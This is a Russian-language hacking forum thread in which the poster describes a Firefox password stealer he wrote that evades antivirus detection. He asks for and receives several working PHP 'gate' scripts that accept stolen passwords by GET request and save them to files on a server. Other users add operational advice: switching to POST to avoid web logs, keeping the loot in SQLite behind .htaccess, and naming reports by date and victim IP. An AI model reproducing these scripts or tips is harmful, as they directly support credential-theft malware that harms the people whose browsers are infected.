Собственно вот проблема. Написал я стилер паролей браузера Firefox всех версий. Проверил и на 3 и на 4 пашет - ВСЕ ХОРОШО, антивири не палят, ЗАМЕЧАТЕЛЬНО! Но стоит добавить в программу функцию отправки письма - как сразу же все антивири орут мол бэкдор или вирус. Куда еще можно сбрасывать пассы кроме как мыло ? И если у кого есть php скрипт вида: http://unnamed/gate.php?text=ТЕКСТ киданите сюда пожалуйста код
дыкнаписать ведь 2 минуты дела --------------добавлено------------------- PHP: <? $file = fopen ("logs.txt","r+"); $text = $_GET["text"]; if (!$file ) { echo("error"); } else { fputs ( $file, $text); echo("ok"); } fclose ($file); ?>
и файлом и текстом. просто вообще нельзя юзать функци отправки на мыло - ибо подозрительно что дергаются пароли и юзается какая то функция отправки письма 2patcher написать и за одну можно - если знаешь как. Просто в php вообще нулевой я =) Спасибо! Только можешь чуток переделать чтобы было так: 1) гейту отправляется сам текст, и название создаваемого файла 2) и проверка - мол если такой фаил создан то ничего не делать, если его нету - создать фаил и сунуть туда текст Я предполагаю что будет так: Code: <? $text = $_GET["text"]; $file = $_GET["file"]; $file = fopen ($file,"r+"); fputs ( $file, $text); fclose ($file); ?> а разве лучше $_GET юзать вместо $_POST ??? Ведь вроде GET запрос имеет ограничение по длине определенное иль нет ?
PHP: <? $filename=$_GET["filename"]; $text = $_GET["text"]; if (!file_exists($filename)) { $file = fopen ($filename,"r+"); if (!$file ) { echo("error"); } else { fputs ( $file, $text); echo("ok"); } fclose ($file); } else { echo("already_writed"); } ?> Передавать text=текст, filename=имя_файла
если надо - измени, это ж не проблема) а так просто ГЕТ тестить проще (хотя писал просто в блокноте без проверки на работоспособность)
Ништяк - спс. И еще я изменил твой параметр r+ на a т.к. параметр r+ открывает уже созданный фаил для чтения и записи, а а/а+ для записи, чтения изаписи и если нету файла то создает его
да эт не трой - это так, побаловался я =) Delphi + .pas файлы для работы с SQLite + synapse Выдергивает пароли и отправляет на гейт где-то за 0,5 секунду =)
для тех кто в танке, все запросы к web серверу логируются, так что разница между POST и GET огромная. GET останется в логе. kakeolala если тебе повезет и твой трой пападет хотябы на 1000 компов давай подсчитаем, ну например я захожу на почту 5 раз в день. 5*1000 = 5000 паролей в день, а в твоем случае 5000 файлов причем в каждом 5 будет храниться один и тотже пароль... день второй +5000 файлов, а пароли все теже... прошел месяц 150000 файлов с 1000 паролей бред? да бред ) юзай бд например sqlite (быстрая + файлик никуда не попадет), где проверяй существование подобной записи. закрой к нему доступ из вне прописав правила в .htaccess (если веб сервак apache) и будет тебе недолгое сщастье, пока твой трой не найдут и не откроят в дизасемблере где легко посмотрят адрес твоего сайта и вычислят тебя, как владельца оплачивающего хостинг и доменное имя
вы не так поняли. Если вы сохранили пароль - он там будет в единственном экземпляре. при чем тут 5*1000 ? Ну как бы хостинг бесплатный - доменной имя от хостинка 2-ого уровня. Так что многое не потеряю =)
ещё можешь в php заюзать функции date() и $_SERVER['REMOTE_ADDR'] и получишь отчёты с именами типа 22-may-2011_10.254.254.255.txt
Ответ по существу: 50/50 Сначало писал я сам. Потом нашел 4 исходника - от разных версии мазины начиная от 1 и до 4. Потом их обядинил все, потом я оптимизировал все